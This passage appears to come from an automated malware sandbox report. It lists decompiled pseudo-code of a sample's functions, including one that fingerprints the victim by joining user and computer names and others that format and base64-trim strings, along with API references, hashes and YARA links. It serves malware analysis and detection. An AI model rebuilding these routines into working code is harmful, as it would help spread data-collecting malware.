				signed int _v24;
				void* __esi;
				long _t43;
				intOrPtr _t44;
				intOrPtr _t46;
				void* _t48;
				void* _t49;
				void* _t50;
				intOrPtr _t54;
				intOrPtr _t57;
				void* _t58;
				void* _t59;
				void* _t60;
				intOrPtr _t66;
				void* _t71;
				void* _t74;
				intOrPtr _t75;
				void* _t77;
				intOrPtr _t79;
				intOrPtr* _t80;
				intOrPtr _t91;

				_t79 =  *0xa3d37c; // 0x33a9818
				_v24 = 8;
				_t43 = GetTickCount();
				_push(5);
				_t74 = 0xa;
				_v16 = _t43;
				_t44 = E00A33A69(_t74,  &_v16);
				_v8 = _t44;
				if(_t44 == 0) {
					_v8 = 0xa3c1ac;
				}
				_t46 = E00A351DA(_t79);
				_v12 = _t46;
				if(_t46 != 0) {
					_t80 = __imp__;
					_t48 =  *_t80(_v8, _t71);
					_t49 =  *_t80(_v12);
					_t50 =  *_t80(_a4);
					_t54 = E00A375F6(lstrlenW(_a8) + _t48 + _t48 + _t49 + _t50 + lstrlenW(_a8) + _t48 + _t48 + _t49 + _t50 + 0x102);
					_v20 = _t54;
					if(_t54 != 0) {
						_t75 =  *0xa3d2e0; // 0x296a5a8
						_t16 = _t75 + 0xa3eb10; // 0x530025
						 *0xa3d118(_t54, _t16, _v8, _v8, _a4, _v12, _a8);
						_push(4);
						_t77 = 5;
						_t57 = E00A33A69(_t77,  &_v16);
						_v8 = _t57;
						if(_t57 == 0) {
							_v8 = 0xa3c1b0;
						}
						_t58 =  *_t80(_v8);
						_t59 =  *_t80(_v12);
						_t60 =  *_t80(_a4);
						_t91 = E00A375F6(lstrlenW(_a12) + _t58 + _t58 + _t59 + _t60 + lstrlenW(_a12) + _t58 + _t58 + _t59 + _t60 + 0x13a);
						if(_t91 == 0) {
							E00A34AAB(_v20);
						} else {
							_t66 =  *0xa3d2e0; // 0x296a5a8
							_t31 = _t66 + 0xa3ec30; // 0x73006d
							 *0xa3d118(_t91, _t31, _v8, _v8, _a4, _v12, _a12);
							 *_a16 = _v20;
							_v24 = _v24 & 0x00000000;
							 *_a20 = _t91;
						}
					}
					E00A34AAB(_v12);
				}
				return _v24;
			}




























                                                                                                                                  0x00a35f6c
                                                                                                                                  0x00a35f72
                                                                                                                                  0x00a35f79
                                                                                                                                  0x00a35f7f
                                                                                                                                  0x00a35f83
                                                                                                                                  0x00a35f87
                                                                                                                                  0x00a35f8a
                                                                                                                                  0x00a35f8f
                                                                                                                                  0x00a35f94
                                                                                                                                  0x00a35f96
                                                                                                                                  0x00a35f96
                                                                                                                                  0x00a35f9f
                                                                                                                                  0x00a35fa4
                                                                                                                                  0x00a35fa9
                                                                                                                                  0x00a35faf
                                                                                                                                  0x00a35fb9
                                                                                                                                  0x00a35fc2
                                                                                                                                  0x00a35fc9
                                                                                                                                  0x00a35fe2
                                                                                                                                  0x00a35fe7
                                                                                                                                  0x00a35fec
                                                                                                                                  0x00a35ff5
                                                                                                                                  0x00a35ffe
                                                                                                                                  0x00a3600f
                                                                                                                                  0x00a36018
                                                                                                                                  0x00a3601c
                                                                                                                                  0x00a36020
                                                                                                                                  0x00a36025
                                                                                                                                  0x00a3602a
                                                                                                                                  0x00a3602c
                                                                                                                                  0x00a3602c
                                                                                                                                  0x00a36036
                                                                                                                                  0x00a3603f
                                                                                                                                  0x00a36046
                                                                                                                                  0x00a3605e
                                                                                                                                  0x00a36062
                                                                                                                                  0x00a3609f
                                                                                                                                  0x00a36064
                                                                                                                                  0x00a36067
                                                                                                                                  0x00a3606f
                                                                                                                                  0x00a36080
                                                                                                                                  0x00a3608c
                                                                                                                                  0x00a36094
                                                                                                                                  0x00a36098
                                                                                                                                  0x00a36098
                                                                                                                                  0x00a36062
                                                                                                                                  0x00a360a7
                                                                                                                                  0x00a360ac
                                                                                                                                  0x00a360b3

                                                                                                                                  APIs
                                                                                                                                  • GetTickCount.KERNEL32 ref: 00A35F79
                                                                                                                                  • lstrlen.KERNEL32(?,80000002,00000005), ref: 00A35FB9
                                                                                                                                  • lstrlen.KERNEL32(00000000), ref: 00A35FC2
                                                                                                                                  • lstrlen.KERNEL32(00000000), ref: 00A35FC9
                                                                                                                                  • lstrlenW.KERNEL32(80000002), ref: 00A35FD6
                                                                                                                                  • lstrlen.KERNEL32(?,00000004), ref: 00A36036
                                                                                                                                  • lstrlen.KERNEL32(?), ref: 00A3603F
                                                                                                                                  • lstrlen.KERNEL32(?), ref: 00A36046
                                                                                                                                  • lstrlenW.KERNEL32(?), ref: 00A3604D
                                                                                                                                    • Part of subcall function 00A34AAB: RtlFreeHeap.NTDLL(00000000,00000000,00A35012,00000000,?,?,00000000), ref: 00A34AB7
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.677239189.0000000000A31000.00000020.00020000.sdmp, Offset: 00A30000, based on PE: true
                                                                                                                                  • Associated: 00000002.00000002.677195440.0000000000A30000.00000004.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000002.00000002.677288144.0000000000A3C000.00000002.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000002.00000002.677322676.0000000000A3D000.00000004.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000002.00000002.677335408.0000000000A3F000.00000002.00020000.sdmp Download File
                                                                                                                                  Similarity
                                                                                                                                  • API ID: lstrlen$CountFreeHeapTick
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2535036572-0
                                                                                                                                  • Opcode ID: 5b7c797715328fedeacb0753cf53989bd224ca01af6dece6c72eab78eb9d0983
                                                                                                                                  • Instruction ID: 196f0afd4079fe5c03cd289ea360321e828a760721c54d6df9e7cafafe4dfa49
                                                                                                                                  • Opcode Fuzzy Hash: 5b7c797715328fedeacb0753cf53989bd224ca01af6dece6c72eab78eb9d0983
                                                                                                                                  • Instruction Fuzzy Hash: D6414576D00209FBCF12AFE8DD09A9EBBB5EF44354F158055F904A7221D7369A21EBA0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 6E932FB2, Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 285COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 6E92F299: GetLastError.KERNEL32(00000000,00000000,?,6E927CF9,?,?,00000003,?,6E8F1083,6E8F10F4,?,6E8F0EE0,00000000,00000000,00000000,00000004), ref: 6E92F29E
                                                                                                                                    • Part of subcall function 6E92F299: SetLastError.KERNEL32(00000000,6E97A1A0,000000FF,?,6E927CF9,?,?,00000003,?,6E8F1083,6E8F10F4,?,6E8F0EE0,00000000,00000000,00000000), ref: 6E92F33C
                                                                                                                                  • _free.LIBCMT ref: 6E9332BF
                                                                                                                                  • _free.LIBCMT ref: 6E9332D8
                                                                                                                                  • _free.LIBCMT ref: 6E933316
                                                                                                                                  • _free.LIBCMT ref: 6E93331F
                                                                                                                                  • _free.LIBCMT ref: 6E93332B
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.682362002.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _free$ErrorLast
                                                                                                                                  • String ID: C
                                                                                                                                  • API String ID: 3291180501-1037565863
                                                                                                                                  • Opcode ID: d38a72fb83b9e2ddee225bc97fb86dc0483a5fbff13c3b5b6243b29c4e28c77d
                                                                                                                                  • Instruction ID: ed8a075b3687f1ef9bae86a4afd6dfa99254e542ee22670e7f213bffc20a41de
                                                                                                                                  • Opcode Fuzzy Hash: d38a72fb83b9e2ddee225bc97fb86dc0483a5fbff13c3b5b6243b29c4e28c77d
                                                                                                                                  • Instruction Fuzzy Hash: 51C16F7594122ADFDB24CF68C898A9DB3B8FF49304F6045AAD819A7354D731EE90CF40
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 00A3137A, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 83COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                  			E00A3137A() {
				long _v8;
				long _v12;
				int _v16;
				long _t39;
				long _t43;
				signed int _t47;
				short _t51;
				signed int _t52;
				int _t56;
				int _t57;
				char* _t64;
				short* _t67;

				_v16 = 0;
				_v8 = 0;
				GetUserNameW(0,  &_v8);
				_t39 = _v8;
				if(_t39 != 0) {
					_v12 = _t39;
					_v8 = 0;
					GetComputerNameW(0,  &_v8);
					_t43 = _v8;
					if(_t43 != 0) {
						_v12 = _v12 + _t43 + 2;
						_t64 = E00A375F6(_v12 + _t43 + 2 << 2);
						if(_t64 != 0) {
							_t47 = _v12;
							_t67 = _t64 + _t47 * 2;
							_v8 = _t47;
							if(GetUserNameW(_t67,  &_v8) == 0) {
								L7:
								E00A34AAB(_t64);
							} else {
								_t51 = 0x40;
								 *((short*)(_t67 + _v8 * 2 - 2)) = _t51;
								_t52 = _v8;
								_v12 = _v12 - _t52;
								if(GetComputerNameW( &(_t67[_t52]),  &_v12) == 0) {
									goto L7;
								} else {
									_t56 = _v12 + _v8;
									_t31 = _t56 + 2; // 0xa34565
									_v12 = _t56;
									_t57 = WideCharToMultiByte(0xfde9, 0, _t67, _t56, _t64, _t56 + _t31, 0, 0);
									_v8 = _t57;
									if(_t57 == 0) {
										goto L7;
									} else {
										_t64[_t57] = 0;
										_v16 = _t64;
									}
								}
							}
						}
					}
				}
				return _v16;
			}















                                                                                                                                  0x00a31388
                                                                                                                                  0x00a3138b
                                                                                                                                  0x00a3138e
                                                                                                                                  0x00a31394
                                                                                                                                  0x00a31399
                                                                                                                                  0x00a3139f
                                                                                                                                  0x00a313a7
                                                                                                                                  0x00a313aa
                                                                                                                                  0x00a313b0
                                                                                                                                  0x00a313b5
                                                                                                                                  0x00a313c2
                                                                                                                                  0x00a313cf
                                                                                                                                  0x00a313d3
                                                                                                                                  0x00a313d5
                                                                                                                                  0x00a313d9
                                                                                                                                  0x00a313dc
                                                                                                                                  0x00a313ec
                                                                                                                                  0x00a3143f
                                                                                                                                  0x00a31440
                                                                                                                                  0x00a313ee
                                                                                                                                  0x00a313f3
                                                                                                                                  0x00a313f4
                                                                                                                                  0x00a313f9
                                                                                                                                  0x00a313fc
                                                                                                                                  0x00a3140f
                                                                                                                                  0x00000000
                                                                                                                                  0x00a31411
                                                                                                                                  0x00a31414
                                                                                                                                  0x00a31419
                                                                                                                                  0x00a31427
                                                                                                                                  0x00a3142a
                                                                                                                                  0x00a31430
                                                                                                                                  0x00a31435
                                                                                                                                  0x00000000
                                                                                                                                  0x00a31437
                                                                                                                                  0x00a31437
                                                                                                                                  0x00a3143a
                                                                                                                                  0x00a3143a
                                                                                                                                  0x00a31435
                                                                                                                                  0x00a3140f
                                                                                                                                  0x00a31445
                                                                                                                                  0x00a31446
                                                                                                                                  0x00a313b5
                                                                                                                                  0x00a3144c

                                                                                                                                  APIs
                                                                                                                                  • GetUserNameW.ADVAPI32(00000000,00A34563), ref: 00A3138E
                                                                                                                                  • GetComputerNameW.KERNEL32(00000000,00A34563), ref: 00A313AA
                                                                                                                                    • Part of subcall function 00A375F6: RtlAllocateHeap.NTDLL(00000000,00000000,00A34F70), ref: 00A37602
                                                                                                                                  • GetUserNameW.ADVAPI32(00000000,00A34563), ref: 00A313E4
                                                                                                                                  • GetComputerNameW.KERNEL32(00A34563,?), ref: 00A31407
                                                                                                                                  • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,00A34563,00000000,00A34565,00000000,00000000,?,?,00A34563), ref: 00A3142A
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.677239189.0000000000A31000.00000020.00020000.sdmp, Offset: 00A30000, based on PE: true
                                                                                                                                  • Associated: 00000002.00000002.677195440.0000000000A30000.00000004.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000002.00000002.677288144.0000000000A3C000.00000002.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000002.00000002.677322676.0000000000A3D000.00000004.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000002.00000002.677335408.0000000000A3F000.00000002.00020000.sdmp Download File
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Name$ComputerUser$AllocateByteCharHeapMultiWide
                                                                                                                                  • String ID: @ht
                                                                                                                                  • API String ID: 3850880919-1371871952
                                                                                                                                  • Opcode ID: e81e7f7b3b414e44417966d4c1c749ea1594b98f04ab4d745c5c9c679800dbf8
                                                                                                                                  • Instruction ID: e5724f2d154aa9c14fc3fbd95bba3e11c2c41e03cc584fac8e35d8df24acc093
                                                                                                                                  • Opcode Fuzzy Hash: e81e7f7b3b414e44417966d4c1c749ea1594b98f04ab4d745c5c9c679800dbf8
                                                                                                                                  • Instruction Fuzzy Hash: 3821D8B6900248FFCB11DFE9D985DAEBBB9EF45700F5044AAF502E7200DA309B45DB11
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 00A31974, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 68stringCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 63%
                                                                                                                                  			E00A31974(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _t9;
				intOrPtr _t13;
				char* _t28;
				void* _t33;
				void* _t34;
				char* _t36;
				intOrPtr* _t40;
				char* _t41;
				char* _t42;
				char* _t43;

				_t34 = __edx;
				_push(__ecx);
				_t9 =  *0xa3d2e0; // 0x296a5a8
				_t1 = _t9 + 0xa3e62c; // 0x253d7325
				_t36 = 0;
				_t28 = E00A343A8(__ecx, _t1);
				if(_t28 != 0) {
					_t40 = __imp__;
					_t13 =  *_t40(_t28);
					_v8 = _t13;
					_t41 = E00A375F6(_v8 +  *_t40(_a4) + 1);
					if(_t41 != 0) {
						strcpy(_t41, _t28);
						_pop(_t33);
						__imp__(_t41, _a4);
						_t36 = E00A35601(_t34, _t41, _a8);
						E00A34AAB(_t41);
						_t42 = E00A3756E(StrTrimA(_t36, "="), _t36);
						if(_t42 != 0) {
							E00A34AAB(_t36);
							_t36 = _t42;
						}
						_t43 = E00A326DD(_t36, _t33);
						if(_t43 != 0) {
							E00A34AAB(_t36);
							_t36 = _t43;
						}
					}
					E00A34AAB(_t28);
				}
				return _t36;
			}














                                                                                                                                  0x00a31974
                                                                                                                                  0x00a31977
                                                                                                                                  0x00a31978
                                                                                                                                  0x00a31980
                                                                                                                                  0x00a31987
                                                                                                                                  0x00a3198e
                                                                                                                                  0x00a31992
                                                                                                                                  0x00a31998
                                                                                                                                  0x00a3199f
                                                                                                                                  0x00a319a4
                                                                                                                                  0x00a319b6
                                                                                                                                  0x00a319ba
                                                                                                                                  0x00a319be
                                                                                                                                  0x00a319c4
                                                                                                                                  0x00a319c9
                                                                                                                                  0x00a319d9
                                                                                                                                  0x00a319db
                                                                                                                                  0x00a319f2
                                                                                                                                  0x00a319f6
                                                                                                                                  0x00a319f9
                                                                                                                                  0x00a319fe
                                                                                                                                  0x00a319fe
                                                                                                                                  0x00a31a07
                                                                                                                                  0x00a31a0b
                                                                                                                                  0x00a31a0e
                                                                                                                                  0x00a31a13
                                                                                                                                  0x00a31a13
                                                                                                                                  0x00a31a0b
                                                                                                                                  0x00a31a16
                                                                                                                                  0x00a31a16
                                                                                                                                  0x00a31a21

                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00A343A8: lstrlen.KERNEL32(00000000,00000000,00000000,7691C740,?,?,?,00A3198E,253D7325,00000000,00000000,7691C740,?,?,00A34653,?), ref: 00A3440F
                                                                                                                                    • Part of subcall function 00A343A8: sprintf.NTDLL ref: 00A34430
                                                                                                                                  • lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,7691C740,?,?,00A34653,?,033A95B0), ref: 00A3199F
                                                                                                                                  • lstrlen.KERNEL32(?,?,?,00A34653,?,033A95B0), ref: 00A319A7
                                                                                                                                    • Part of subcall function 00A375F6: RtlAllocateHeap.NTDLL(00000000,00000000,00A34F70), ref: 00A37602
                                                                                                                                  • strcpy.NTDLL ref: 00A319BE
                                                                                                                                  • lstrcat.KERNEL32(00000000,?), ref: 00A319C9
                                                                                                                                    • Part of subcall function 00A35601: lstrlen.KERNEL32(?,?,?,?,00000001,00000000,00000000,?,00A319D8,00000000,?,?,?,00A34653,?,033A95B0), ref: 00A35618
                                                                                                                                    • Part of subcall function 00A34AAB: RtlFreeHeap.NTDLL(00000000,00000000,00A35012,00000000,?,?,00000000), ref: 00A34AB7
                                                                                                                                  • StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,00A34653,?,033A95B0), ref: 00A319E6
                                                                                                                                    • Part of subcall function 00A3756E: lstrlen.KERNEL32(?,00000000,00000000,00000000,?,00A319F2,00000000,?,?,00A34653,?,033A95B0), ref: 00A37578
                                                                                                                                    • Part of subcall function 00A3756E: _snprintf.NTDLL ref: 00A375D6
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.677239189.0000000000A31000.00000020.00020000.sdmp, Offset: 00A30000, based on PE: true
                                                                                                                                  • Associated: 00000002.00000002.677195440.0000000000A30000.00000004.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000002.00000002.677288144.0000000000A3C000.00000002.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000002.00000002.677322676.0000000000A3D000.00000004.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000002.00000002.677335408.0000000000A3F000.00000002.00020000.sdmp Download File
                                                                                                                                  Similarity
                                                                                                                                  • API ID: lstrlen$Heap$AllocateFreeTrim_snprintflstrcatsprintfstrcpy
                                                                                                                                  • String ID: =
                                                                                                                                  • API String ID: 2864389247-1428090586
                                                                                                                                  • Opcode ID: 1c2a43952ec96244c997ed6d56f9dcc1b34c1944ab091518fd47d8ba0bdc988e
                                                                                                                                  • Instruction ID: cdd41be8685c64600e60a80276a3cdaf7c82b61c21132f71b5e55e9b66633db6
                                                                                                                                  • Opcode Fuzzy Hash: 1c2a43952ec96244c997ed6d56f9dcc1b34c1944ab091518fd47d8ba0bdc988e
                                                                                                                                  • Instruction Fuzzy Hash: AE11C233912624BB8612B7F49D86C6F77AD9E897A0B054015FA01AB202DE34DD0247A4
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 6E905681, Relevance: 10.6, APIs: 7, Instructions: 66COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 6E905688
                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 6E905692
                                                                                                                                  • int.LIBCPMT ref: 6E9056A9
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E8F208C
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F20A6
                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 6E9056E3
                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 6E905703
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 6E905710
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 6E90571D
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.682362002.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$Lockit$H_prolog3Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3920336645-0
                                                                                                                                  • Opcode ID: 47fbccbaf4d3c66af652bee8934bc126aca6ac8b1d239c66fc3682141d645f9f
                                                                                                                                  • Instruction ID: 70cb1188cd3bd5326050782a795dcf9589d5bb0d0713073cc7b52933c554cb35
                                                                                                                                  • Opcode Fuzzy Hash: 47fbccbaf4d3c66af652bee8934bc126aca6ac8b1d239c66fc3682141d645f9f
                                                                                                                                  • Instruction Fuzzy Hash: 9921BE71900619DBCF12CFE8C9446EEBBB9AF94758F504D0DE8506B280CBB0D946CF81
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 6E8F7D9F, Relevance: 10.6, APIs: 7, Instructions: 66COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 6E8F7DA6
                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 6E8F7DB0
                                                                                                                                  • int.LIBCPMT ref: 6E8F7DC7
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E8F208C
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F20A6
                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 6E8F7E01
                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F7E21
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 6E8F7E2E
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 6E8F7E3B
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.682362002.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$Lockit$H_prolog3Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3920336645-0
                                                                                                                                  • Opcode ID: 8a0dba55f821380c3583f06942485365aa4d17700697163c691d3ebb1b63ee7a
                                                                                                                                  • Instruction ID: 62cd371ed5acbed92dd8687ec074053403f710fd931aeef3bd0212afc5d21419
                                                                                                                                  • Opcode Fuzzy Hash: 8a0dba55f821380c3583f06942485365aa4d17700697163c691d3ebb1b63ee7a
                                                                                                                                  • Instruction Fuzzy Hash: 8F21C37190061ADBCF02DFE8C9556EE7BB9AF45798F104D0EE8506B280DBB4DE06CB91
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 6E93D4AB, Relevance: 10.6, APIs: 7, Instructions: 65COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 6E93D196: _free.LIBCMT ref: 6E93D1BB
                                                                                                                                  • _free.LIBCMT ref: 6E93D4F9
                                                                                                                                    • Part of subcall function 6E931434: HeapFree.KERNEL32(00000000,00000000,?,6E93D1C0,?,00000000,?,?,?,6E93D4C4,?,00000007,?,?,6E93B43B,?), ref: 6E93144A
                                                                                                                                    • Part of subcall function 6E931434: GetLastError.KERNEL32(?,?,6E93D1C0,?,00000000,?,?,?,6E93D4C4,?,00000007,?,?,6E93B43B,?,?), ref: 6E93145C
                                                                                                                                  • _free.LIBCMT ref: 6E93D504
                                                                                                                                  • _free.LIBCMT ref: 6E93D50F
                                                                                                                                  • _free.LIBCMT ref: 6E93D563
                                                                                                                                  • _free.LIBCMT ref: 6E93D56E
                                                                                                                                  • _free.LIBCMT ref: 6E93D579
                                                                                                                                  • _free.LIBCMT ref: 6E93D584
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.682362002.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 776569668-0
                                                                                                                                  • Opcode ID: 39b13820a97e8b63a2bd5758ecc74a4ff61c4819cdfe69e10f1538665c390981
                                                                                                                                  • Instruction ID: 1d6ea0232c3b17981f01e70afe98d97150181f461490c57587651ce70f166d46
                                                                                                                                  • Opcode Fuzzy Hash: 39b13820a97e8b63a2bd5758ecc74a4ff61c4819cdfe69e10f1538665c390981
                                                                                                                                  • Instruction Fuzzy Hash: 99118131951B24ABE520ABF0CC09FCB77AE5FA1708F904D14E29966262DB34F5188EA0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 6E8F1C96, Relevance: 10.6, APIs: 7, Instructions: 53COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 6E8F1C9D
                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 6E8F1CA7
                                                                                                                                  • int.LIBCPMT ref: 6E8F1CBE
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E8F208C
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F20A6
                                                                                                                                  • numpunct.LIBCPMT ref: 6E8F1CE1
                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 6E8F1CF8
                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F1D18
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 6E8F1D25
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.682362002.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registernumpunct
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3064348918-0
                                                                                                                                  • Opcode ID: 12d335e6f6f7b156dff9692d7761dc7e5c65f9840653dd94bc3b02f4a9dd28ed
                                                                                                                                  • Instruction ID: 25b3e64841940af01c0726f8d2e04ccf7593446a050bdbc4f0793be7161eef49
                                                                                                                                  • Opcode Fuzzy Hash: 12d335e6f6f7b156dff9692d7761dc7e5c65f9840653dd94bc3b02f4a9dd28ed
                                                                                                                                  • Instruction Fuzzy Hash: 6A11A071900619CBCB01DBE8C9547EDBBB9AF85398F244D08D4106B291DF78994B8B91
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 6E8F76A3, Relevance: 10.5, APIs: 7, Instructions: 49COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 6E8F76AA
                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 6E8F76B4
                                                                                                                                  • int.LIBCPMT ref: 6E8F76CB
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E8F208C
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F20A6
                                                                                                                                  • moneypunct.LIBCPMT ref: 6E8F76EE
                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 6E8F7705
                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F7725
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 6E8F7732
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.682362002.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registermoneypunct
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3376033448-0
                                                                                                                                  • Opcode ID: bc1c7e844a45d9e42bbf48954f26c998c10ef990978bc47933128bb72f022cc7
                                                                                                                                  • Instruction ID: afc37bdf51097a3f4d9e8732628360971be9f2a493777e728531e9b3d8e27067
                                                                                                                                  • Opcode Fuzzy Hash: bc1c7e844a45d9e42bbf48954f26c998c10ef990978bc47933128bb72f022cc7
                                                                                                                                  • Instruction Fuzzy Hash: DF01ED3191061ACBCB01DBE8C954AEDB7B9AF853A8F114C08D8106B2C0DB74D90BCB90
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 6E8F760E, Relevance: 10.5, APIs: 7, Instructions: 49COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 6E8F7615
                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 6E8F761F
                                                                                                                                  • int.LIBCPMT ref: 6E8F7636
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E8F208C
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F20A6
                                                                                                                                  • moneypunct.LIBCPMT ref: 6E8F7659
                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 6E8F7670
                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F7690
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 6E8F769D
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.682362002.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registermoneypunct
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3376033448-0
                                                                                                                                  • Opcode ID: aa920c784afd7c0b5a05082a07aefc037d607c27282b2d292fb4f4cc37df7121
                                                                                                                                  • Instruction ID: 240f73b79692adb266f9e352a6cceda0ba1cb31d7153e4a98ae88e4c048d88c1
